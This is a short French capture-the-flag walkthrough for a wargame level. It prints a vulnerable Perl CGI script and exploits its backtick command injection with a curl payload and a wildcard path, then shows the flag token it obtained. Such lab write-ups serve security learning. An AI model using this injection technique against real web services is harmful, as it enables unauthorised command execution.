## Methode pour trouver le flag ##
/*
*   Format:
*   - Objectif
*   commande
*       -> resultat
*/

- Script perl
cat level12.pl 
    -> resultat:
/**********************************************/
#!/usr/bin/env perl
# localhost:4646 (curl possible)
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; -> passe en majuscule toutes les minuscules dans le 1er parametre (LINUX sensible a la casse)
  $xx =~ s/\s.*//; -> (ref message slack : efface tous les caracteres apres le 1er espace trouver)
  @output = `egrep "^$xx" /tmp/xd 2>&1`; -> exploitation possible avec backquotes!!!!
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));
/*********************************************/

- En connaissant les parametres, il faut tout d abord creer un script /tmp/HACK
nano /tmp/HACK:
#!/bin/sh
getflag | write level12
-> on utilise le getflag pour obtenir le flag et la commande write qui permet d envoyer un message a un utilisateur donne ici level12 nous! 

Pour passer le script HACK en parametre, il faut deja le passer en backquotes pour qu il soit execute, il faut remplace tmp par une wildcard * pour eviter que le regex ne change /tmp -> /TMP!
- il reste plus qu'a exploite la faille en appelant le script hack:
curl http://localhost:4646?x='`/*/HACK`' ou ./level12.pl `/*/HACK`
    -> Output:
Broadcast Message from flag12@Snow
        (somewhere) at 14:08 ...
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
Token trouvé! 